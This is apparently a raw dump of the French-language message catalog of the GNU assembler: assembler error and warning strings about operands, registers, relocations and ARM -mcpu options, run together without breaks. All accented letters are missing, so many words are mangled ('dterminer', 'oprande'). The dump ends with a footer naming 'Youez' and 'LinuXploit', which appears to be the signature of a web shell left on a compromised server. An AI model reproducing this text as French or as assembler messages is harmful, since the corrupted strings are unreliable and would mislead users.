pair avec ] Aucun pointeur de fichier courantaucun nom de fichier aprs l'option -tpas d'entre hppa_fixup entry pour le coirrectif du type 0x%xaucun suffixe de mnmonique d'instruction fourni et pas d'oprandes registre;
ne peut dterminer la taille de l'instructionaucun suffixe de mnmonique d'instruction fourni; ne peut dterminer la taille de l'immdiatpas de fragment enregistr pour le litralpas de numro de squence aprs !%spas de telle modificateur d'architecture:  %s pas de telle architecture: %spas de telle instruction:  %s pas de tel  sfr  pour cette architecturepas de dfinition GREG satisfaisante pour les oprandespas d'tiquette spcifi pour %spas de faon de traiter .file  l'intrieur d'une section .ent/.endexpression non absolue dams le champ de constantevaleur non absolue utilise avec .space/.bescompteur d'octet n'est pas une constanteexpression n'est pas une constante dans la dclaration  .elseif expression n'est pas une constante dans la dclaration  .if game de registres non contiguOprande OPF n'est pas immdiate, ignorn'est pas une instruction de 16 bits  %s pas assez d'oprandes (%d) pour '%s'; attendu %dnombre de jetons litraux != 1Les numros de registres doivent tre dans les bornes [1:4]oprande d'adresse impaire: %lddplacement impair  %xdistance impaire de branchement (0x%lx octets)nombre impair d'octets dans la description de l'oprandedcalage hors limitedcalage d'adresse trop grandseule une expression de constante est permiseseul des constantes de dcalage sont supportes dans une section absolueseul les registres LO sont permis avec un immdiatseul r15 est permis iciseuls deux registres conscutifs VFP SP sont permis iciopcode 'NOP.N' non disponible dans cette configurationopcode  %s  n'est pas support pour la cible %sopcode n'a pas d'effetopcode non support sur ce processeuropcode non support surce processeur: %s (%s)ouverture CFI  la fin du fichier; directive .cfi_endproc manquanteoprande %s0x%lx hors limite.oprande n'est pas un immdiatl'oprande doit tre une constanteoprande doit tre un multiple de 2oprande doit tre un multiple de 4oprande doit tre un absolu dans les bornes %u..%u et non pas %ldoprande n'est pas un multiple de 4 pour PT, pTA ou PTB: %dnombre d'oprandes ne concordent pasOprande hors limiteoprande hors limite pour PT, PTA et PTBoprande hors limite, instruction a t tendueoprande hors limite: %ldoprande hors limite: %ludbordement de l'oprandevaleur d'oprande hors limite pour l'instructiontailles/oprandes ne concordent pasoprande pour le opcode  %s  ne correspond pas avec un format valideoprandes ne concordent pasoprandes n'taient pas rductibles au moment de l'assemblageoperation combines des symboles dans diffrent segmentsL'option --link-relax est seulement support dans le format b.outL'option  %s  ne peut pas tre ngativeoption  %s  n'est pas reconnueoption  -%c%s  est dprci: %shors limitedbordement durant le branchement vers %s; converti en une squence d'instruction plus longuedbordement dans la table de litrals (.lit8)dbordement dans la table de litrals (.lita)p2align n'est pas support pour cette cibleconflit d'empaquetage: %s doit tre soumis squentiellementparallleLigne partielle  la fin du fichier est ignorePC le peut tre utilis en mode r-critureRelative au PCpcrel pour branchement vers %s est trop loin (0x%lx)pcrel pour loopt est trop loign (0x%lx)pcrel pour lrw/jmpi/jsri vers %s est trop loin (0x%lx)pcrel trop loignregistre de pointeur (X, Y ou Z) est requistregistre de pointeurs (Y ou Z) requisregistre de pointeurs Z requisexpression post-indexe dans une instruction prchargeinstruction pre-indexe attendueentre CFI prcdente n'est pas ferm (.cfi_endproc manquant)pseudo-op illgal  l'intrieur de .struct/.unionr14 n'est pas permis icir15 utilis comme registre de base de stockage n'est pas permisr15 n'est pas permis icir2 ne devrait pas tre utilis en mode d'adressage indexrdhi et rdlo doivent tre diffrentsrdhi, rdlo et rm doivent tous tre diffrentscode r-entrantredfinition du registre globalredfinition du type MCU %s' vers %s'redfinition du type MCU  %s  %s prfixe %s redondantreg-reg attenduregistre attendu, mais a eu '%.6s'registre attendu, pas '%.100s'registre de mauvaise taille pour le mot %sregistre de mauvaise taille pour l'adresse %sliste de registres n'est pas en ordre ascendantnom de registre ou numro de registre 0  31 est requisNumro de registre au-dessus de 15 est requisnumro de registre hors limiteregistre r%d hors limiteregistre r0 ne peut tre utilis iciresigstres r16-R32 requisregistre R24, R26, R28 ou R30 est requisgamme de registres n'est pas en ordre ascendantregistre rh%d hors limiteregistre rl%d hors limiteregistre rq%d n'existe pasregistre rq%d hors limiteregistre rr%d n'existe pasregistre rr%d hors limitedcalage de sauvegarde du registre n'est pas un multiple de %uregistre section a du contenu
syntaxe du registre est .register %%g[2367],{#scratch|symbolname|#ignore}valeur de registre utilise comme expressionadresse relative hors limiteappel relatif hors limitesaut relatif hors limiterelche d'un branchement hors limite dans le saut (jump)relocalisation %d n'est pas support dans le format du fichier objetrelocalisation non applicablerelocalisation hors limitedbordement de relocalisationcompteur de rptition < 0; .fill ignorconflit de ressources (A%d)conflit de ressources (fanion C)conflit de ressources (fanion F)conflit de ressources (PSW)conflit de ressources (R%d)reste de la ligne ignore; premier caractre ignor est  %c restauration sans sauvegardeobtenu de mips_ip(%s) insn_opcode = 0x%x
oprande de droite est un grand nombre; entier 0 assumoprande de droite est un nombre flottant; entier 0 assumrva sans symbolemme type de prfixe utilis deux foisfacteur d'chelle invalide pour cette architecture; a besoin de cpu32 ou 68020 ou plusfacteur d'chelle de %d sans registre d'indexrelocalisation sdaoff() utilise sur une instruction qui ne la supporte passeconde directeive .ent tourve avant la directive .endseconde oprande manquanteseconde oprande doit tre un 1seconde oprande de .insn n'est pas constante
Le second registre devrait suivre le tiret dans la liste de registressection %s renomme plusieurs foissection  %s  ayant l'alias `%s' n'est pas utilisechangement de section  partir de la paire BSPEC/ESPEC n'est pas supportsection des symboles est dj globalerecherche jusqu' la fin de .incbin a chou  %s le processeur choisi ne supporte pas les opcode ARMle processeur choisi ne supporte pas les opcode THUMBle processeur choisi ne supporte pas  %s numro de squence utilis pour !tlsgd!%ldnumro de squence utilis dans !tlsldm!%ldsquentielset: nombre n'est pas dans les bornes -2147483648..4294967295set: nombre n'est pas dans les bornes 0..4294967295setsw: nombre n'est pas dans les bornes -2147483648..4294967295initialisation incorrecte des attributs de section de %sinitialisation incorrecte du type de section pour %ssetx: registre temporaire G0 illgalsetx: registre temporaire identique au registre de destinationexpression de dcalage attendul'expression de dcalage est trop grandebranchement short avec un dcalage zro: utiliser :wdevrait avoir 1 ou 2 oprandesdevrait avoir deux oprandesdbordement de .word sign; commutation peut tre trop grande; %ld  0x%lxtaille ngative; .fill ignor.escamotage des prfixes sur cette instructionescamotage d'une instruction de 2 motsquelques symboles non dfinis; zro assumsourceoprande source doit tre une adresse absolue de 16 bitsoprande source doit tre un registre de 8 bitsregistre source doit tre r1source1 et dest doivent tre le mme registreallocation d'espace trop complexe dans la section absolueallocation d'espace trop complexe dans la section communesparc convert_frag
instruction spciale de gauche %s crase l'instruction du conteneur de droite  %s localisation spcifie n'tait pas aligne TETRAfausses oprandes; (%d oprandes/instructions au maximum)prfixe  %s  autonomeadresse de dpart non supportetrange hauteur de papier, initialis sans formatchane trop grande (%lu octets)chanes doivent tre placse dans une sectionsuffixe ou oprande invalide pour  %s supporter l'inter-rseautage ARM/Thumbsymbole  %s  est indfini; zro assumsymbole  %s  ayant l'alias `%s' n'est pas utilissymbole  %s  est dj dfiniSymbole  %s  ne peut tre  la fois weak et commonsymbole  %s  est dj dfinisymbole  %s est dj dfini comme %s /%s%ldboucle de dfinition de symbole rencontre   %s symbole dans .toc ne concorde pas avec aucun .tcsymbole%dsymboles assigns avec .eval doivent dbuter avec une lettreerreur de syntaxeerreur de syntaxe dans .startof. ou .sizeof.erreur de syntaxe dans @(disp,[Rn, gbr, pc])erreur de syntaxe dans @(r0,...)erreur de syntaxe dans @(r0...)erreur de syntaxes dans la directive de contrle structureerreur de syntaxe: code de condition inattenduerreur de syntaxe: attendu  ], obtenu %c ERREUR de syntaxe: spcificateur de table d'entres invalide  %s erreur de syntaxe: registre inattenduerreur de syntaxe: registre systme inattenduerreur de syntaxe: valeur manquante avant le nom du registreerreur de syntaxes;  )  n'est pas permis icierreur de syntaxe:  ,  attenduerreur de syntaxe; obtenu  %c mais attendait %c erreur de syntaxe;  (  manquante aprs le dplacementerreur de syntaxe:  )  manquante aprs le registre de baseregistres systme ne peut tre inclus dans la listetiquette non repre pour .tag %scible de l'instruction %s doit tre une tiquetterelocalisation tdaoff() utilise sur une instruction qui ne la supporte pastexte de l'tiquette  %s  aligne sur une frontire impairele type de %s est trop complexe; il sera simplifice mode d'adressage n'est pas applicable pour la cible de l'oprandece mode d'adressage requiert un registre de base avec criturecette chane ne peut pas contenir '\0'trop peu d'oprandestrop de !literal!%ld pour %strop d'entres .dimtrop d'entres .sizetrop de registres GREG allous (maximum %d)trop d'argumentstrop de correctifstrop de lda insns pour !gpdisp!%ldtrop de ldah insns pour !gpdisp!%ldtrop de lituse insn pour !lituse)tlsgd!%ldtrop de lituse insn pour !lituse_tlsldm!%ldtrop de rfrences mmoire pour  %s trop de rfrences en mmoire pour  %s trop d'oprandestrop d'oprandes (%d) pour '%s'; attendu %dtrop d'oprandes: %strop d'arguments positionnelstrop de  st_End traduction de bgeni en movitraduction de bmaski en movitraduction de mgeni en movitraduction   %sp exception par trappe non supporte sur ISA 1fichier  %s  tronqu, %ld de %ld octets lusdeux pseudo-op .function sans .eftype %d relocalisation complt?
incapable de calculer les instructions ADRL pour le dcalage PC de 0x%lxincapable d'largir l'instructiondonnes non alignes dans une localisation absolue ne sont pas supportesregistre non alignnumro de fichier %ld non assigncrochets non pairs dans  l'oprande %d.parenthses non paires dans l'oprande %d.instruction indcodable dans le fragment d'instructioncombinaison d'oprandes indfiniesymbole indfini  %s  dans l'oprationsymbole indfini  %s dans l'opration d'initialisation %s type de relocalisation 12-bits attendutype de relocalisation 18-bits attendufin inattendue du fichier dans irp ou irpcclasse de stockage inattendue %d%d non trait
correctif de relocalisation local non trait %stype de relocalisation non trait %snon trait: .proc %s,%dopcode non implant  %s segment non implant %s dans l'oprandeinconnuniveau ISA inconnu %sMCU inconnue: %s
mode d'adressage inconnu %smode d'adressage inconnu pour l'oprande %sextension d'architecture inconnue  %s architecture inconnue %sarchitecture inconnue  %s 
argument inconnue pour .usepvcode de condition inconnue: %scontrainte inconnue  %c cpu inconnu  %s directive inconnuechappement inconnu  \%c  dans la chane; ignortype d'excution inconnue pass  write_2_short()expression inconnue dans l'oprande %sexpression inconnue dans l'oprande %s. Utiliser #llo() #lhi() #hlo() #hhi() format de virgule flottante inconnu  %s 
type de virgule flottante inconnue  %c instruction inconnue  %s opcode inconnuopcode inconnu  %s opcode inconnu %sopcode inconnu  %s opcode1 inconnu  %s opcode2 inconnu  %s opcode inconnu: %sopcode inconnu  %s oprande inconnue %soprande de dcalage inconnue: %x
Oprateur inconnu %soprateur inconnu %s. Voulez-vous dire X(Rn) ou #[hl][hl][oi](CONST) ?oprateur inconnu (r%s subsitutu comme nom de registretype de procdure inconnuepseudo-op inconnu:   %s attribut de section inconnu  %c oprande inconnue/incorrecte [  non pairdirective end non pairetype de cpu non reconnu  %s type .linkonce non reconnu  %s attribut .section non reconnu: ncessite a,w,x,M,S,G,Tcaractres non reconnus  la fin du traitement parallle insnnom de l'mulation non reconnu  %s option fopt non reconnueopcode non reconnuattribut de section non reconnucommande de section n'est pas reconnnue  %s type de section non reconnnutype de section non reconnnu  %s type de symbole non reconnu  %s compteur de rptition non soluble ou non positif; utilise 1expression non rsolue qui doit tre rsoluene peut rsoudre le symbole cible de boucle: %staile de relocalisation BFD non supporte %urfrence relative au PC non support pour un section diffrentevaleur d'octet non supporte; utiliser un suffixe diffrentconstante de grande taille non supporteoprandes non supportes vers %s:  %s relocalisation non supporterelocalisation non supporte vers %stype de relocalisation non support pour un dcalage de champ DStype de relocalisation non supportattribut de section non support  %c taille de variable ou valeur de remplissage non supportechane non terminechane non termine; fin de ligne insre until sans repeat utiliser -march=armv2utiliser -march=armv2autiliser -march=armv3utiliser -march=armv3mutiliser -march=armv4utiliser -march=armv4tutiliser -march=armv5utilsier -march=armv5tutiliser -march=armv5teutiliser -mcpu=allutiliser -mcpu=arm1utiliser -mcpu=arm2utiliser -mcpu=arm250utiliser -mcpu=arm3utiliser -mcpu=arm6utiliser -mcpu=arm600utiliser -mcpu=arm610utiliser -mcpu=arm620utiliser -mcpu=arm7utiliser -mcpu=arm70utiliser -mcpu=arm700utiliser -mcpu=arm700iutiliser -mcpu=arm710utiliser -mcpu=arm7100utiliser -mcpu=arm710cutiliser -mcpu=arm710tutiliser -mcpu=arm720utiliser -mcpu=arm720tutiliser -mcpu=arm740tutiliser -mcpu=arm7500utiliser -mcpu=arm7500feutiliser -mcpu=arm7dutiliser -mcpu=arm7diutiliser -mcpu=arm7dmutiliser -mcpu=arm7dmiutiliser -mcpu=arm7mutiliser -mcpu=arm7tdmiutiliser -mcpu=arm8utiliser -mcpu=arm810utiliser -mcpu=arm9utiliser -mcpu=arm920utiliser -mcpu=arm940utiliser -mcpu=arm9tdmiutiliser -mcpu=iwmmxtutiliser -mcpu=strongarmutiliser -mcpu=strongarm110utiliser -mcpu=strongarm1100utiliser -mcpu=strongarm1110utiliser -mcpu=xscaleutiliser -mfpu=fpa10utiliser -mfpu=fpa11utiliser -mfpu=fpeutilise .code16 pour assurer un mode d'adressage correctutiliser soit -mfpu=softfpa ou -mfpu=softvfputiliser le pointeur de trameutilise des options vieilles et nouvelles pour dfinit le type de CPUutilise des options vieilles et nouvelles pour dfinit le type de FPUutilisation de r15 dans le bx en mode ARM n'est pas trs utileutilisation de r15 dans le bxj n'est pas trs utileutiliser la vrification de la taille de la pileutilis $at sand ".set noat"utilise un champ de bits dont la largeur est zrovaleur 0x%lx tronque  0x%lxvaleur de %ld hors de l'tendue de dcalage sur un octet.valeur de %ld hors de l'tendue de dcalage sur un double mot.valeur de %ld hors de l'tendue de dcalage sur un mot.valeur de %s est trop grande pour le champ de %d octets  %svaleur hors limitevaleur hors limite: %dvaleur trop grande pour entrer dans %d bitsmmoire virtuelle puiseAVERTISSEMENT: symbole %s n,as pas de csectmot de NOP ajout entre  word multiply et 16- bits multiply 'mot de NOP ajout entre  word multiply et load r-criture arrire du registre de base est IMPRVISIBLEr-criture du registre de base lorsque dans la liste de registres est IMPRVISBLEmore r-criture utilis dans une instruction de prchargementl'criture ou la modification # est imprvisiblenombre d'oprandes erronmauvais registre dans la liste des registres en virgule flottantevous ne pouvez pas utiliser  pop %%cs relocalisation zdaoff() utilise sur une instruction qui ne la supporte paszro assum pour l'expression manquantezro utilis comme valeur immdiate{entre standard}

Youez - 2016 - github.com/yon3zu
LinuXploit